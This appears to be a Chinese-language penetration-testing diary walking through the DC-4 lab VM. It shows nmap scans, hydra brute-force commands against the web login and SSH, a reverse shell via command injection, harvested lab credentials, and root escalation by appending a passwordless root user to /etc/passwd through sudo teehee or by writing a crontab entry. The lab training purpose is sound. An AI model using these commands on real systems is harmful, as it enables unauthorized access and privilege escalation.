菜鸟渗透日记23---DC-4靶机打靶过程详解

实验准备：

       虚拟平台：VMware15.0

       虚拟机：kalilinux

       靶机：dc-4

       实验工具：burpsuite

实验步骤：

1.首先做主机发现，确定ip地址为：192.168.65.161

2.使用nmap进行扫描主机

nmap -sS -Pn -A -p- -n 192.168.65.161

nmap -sV -p- 192.168.65.161

根据nmap扫描结果可知，该主机开放了22的ssh服务和80的http服务并且分别对应的服务版本号是openssh7.4p1和nginx 1.15.10

3.根据开放的服务进行web端访问：

4.提示用admin登录，但是不知道密码，使用hydra进行爆破

hydra -l admin -P /usr/share/wordlists/rockyou.txt 192.168.65.161 http-post-form "/login.php:username=^USER^&password=^PASS^:S=logout" -F

这里注意，如果第一次使用的话可能需要到命令中所存在路径去解压rockyou的压缩包之后即可使用。

5.使用爆破出来的密码登录发现命令可以执行

，

6.抓包，修改命令查看

7. 使用nc命令进行反弹，反弹成功

注意：nc命令使用的是kali机器的ip

8.进入交互模式，便于操作

python -c 'import pty;pty.spawn("/bin/sh")'

 

9.查看home目录，

10.查看jim用户下三个文件内容，查看到backups发现确实是密码的备份，进行查看，确实是密码。

11.查看其他两个文件，

12.考虑hydra进行爆破，得到爆破名。要将刚才查看的old-password的文件copy到本地进行爆破即可。得到用户名账号和密码：jim/Jibril04

hydra -l jim -P jim ssh://192.168.65.161

 

13.使用ssh远程登陆：

14.打开查看m box发现是root用户发来的邮件

进入该路径下查看邮件内容

 

邮件内容是charles给jim发送的一封密码邮件。

charles   ^xHhA&hvim0y

15.然后我们切换到用户charles发现使用sudo查看配置文件

查看用户权限发现，该用户可以以root权限免密码执行 /usr/bin/teehee

16.则有两种方法完成提权操作。

第一种：直接向/etc/passwd中增加内容：

 echo 命令与 sudo 命令配合使用，可以实现向那些只有系统管理员才有权限操作的文件中写入信息

命令解释程序(Shell)

添加一个 hack用户,并使用teehee执行写入 passwd中

echo "admin::0:0:::/bin/bash" | sudo teehee -a /etc/passwd

参数解释

#如：admin:x:0:0::/home/admin:/bin/bash

#[用户名]：[密码]：[UID]：[GID]：[身份描述]：[主目录]：[登录shell]

"-a" 选项的作用等同于 ">>" 命令

直接 su admin，直接无密码进入，

(这里注意，我尝试了好几个用户名结果发现只有admin提权成功，暂时不知道为什么)

拿下旗子。

第二种：通过定时任务执行脚本提权：

向/etc/crontab文件中写入新的定时任务

时间部分全部填写为*，这样默认这个定时任务每分钟执行一次，可以根据情况自行设定。通过执行的脚本将/bin/sh的权限修改为4777，这样就可以在非root用户下执行它，并且执行期间拥有root权限。

 

实验总结：

1、该靶机在web信息收集阶段并没有什么有用的信息，直接爆破获取登陆用户名和密码。

2、在反弹shell后发现一封邮件，拿到新用户的登陆口令。

3、进入新用户后发现其具有超级用户权限，采用创建一个新的免密码root用户或者通过定时任务执行脚本，进行提权。